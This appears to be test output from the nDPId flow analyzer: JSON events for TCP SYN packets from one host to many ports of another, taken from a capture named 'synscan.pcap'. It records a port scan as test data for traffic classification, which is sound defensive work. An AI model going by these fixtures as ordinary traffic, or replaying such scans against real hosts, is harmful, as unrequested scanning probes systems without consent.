+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061212,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_packet_id":1,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061212,"pkt":"ACYLMQczACWzv5HuCABFAAAszC8AADYGRkOsEAAIQA2GNIzT92PdU4MZAAAAAGACDAA1KAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061213,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_packet_id":1,"flow_last_seen":1278275061213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061213,"pkt":"ACYLMQczACWzv5HuCABFAAAsKEUAAC4G8i2sEAAIQA2GNIzTxNXdU4MZAAAAAGACDABntgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsDBEAACsGEWKsEAAIQA2GNIzTBNTdU4MZAAAAAGACEAAjuAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsbRQAACYGtV6sEAAIQA2GNIzTB9jdU4MZAAAAAGACDAAktAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsyTQAACUGWj6sEAAIQA2GNIzTBA7dU4MZAAAAAGACCAAsfgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsQj4AACwG2jSsEAAIQA2GNIzSAQPdUoMYAAAAAGACBAAzjAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsc\/gAACgGrHqsEAAIQA2GNIzSKAPdUoMYAAAAAGACBAAMjAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsTJkAAC0GztmsEAAIQA2GNIzSB\/HdUoMYAAAAAGACCAAongAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsUQEAAC4GyXGsEAAIQA2GNIzSFubdUoMYAAAAAGACDAAVqQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAstS4AAC4GZUSsEAAIQA2GNIzSH53dUoMYAAAAAGACDAAM8gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsxqwAADsGRsasEAAIQA2GNIzSALPdUoMYAAAAAGACEAAn3AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsKv8AADkG5HOsEAAIQA2GNIzSB8DdUoMYAAAAAGACCAAozwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsR8wAAC0G06asEAAIQA2GNIzSJpXdUoMYAAAAAGACCAAJ+gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsGkEAADQG+jGsEAAIQA2GNIzSAjPdUoMYAAAAAGACBAAyXAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAshJIAACsGmOCsEAAIQA2GNIzSAFrdUoMYAAAAAGACEAAoNQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsjeAAACgGkpKsEAAIQA2GNIzSH5TdUoMYAAAAAGACBAAU+wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsnNwAAC0GfpasEAAIQA2GNIzSCqXdUoMYAAAAAGACCAAl6gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAs5ScAACoGOUusEAAIQA2GNIzSATfdUoMYAAAAAGACDAArWAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsVI8AADIGweOsEAAIQA2GNIzSGgrdUoMYAAAAAGACDAAShQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsNeQAAC0G5Y6sEAAIQA2GNIzTDDjdU4MZAAAAAGACCAAkVAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsLcQAACwG7q6sEAAIQA2GNIzTAdHdU4MZAAAAAGACBAAyuwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsg2kAACUGoAmsEAAIQA2GNIzTpg7dU4MZAAAAAGACCACKfQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsEhMAACUGEWCsEAAIQA2GNIzTBFTdU4MZAAAAAGACCAAsOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsXWQAACwGvw6sEAAIQA2GNIzTA+\/dU4MZAAAAAGACBAAwnQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 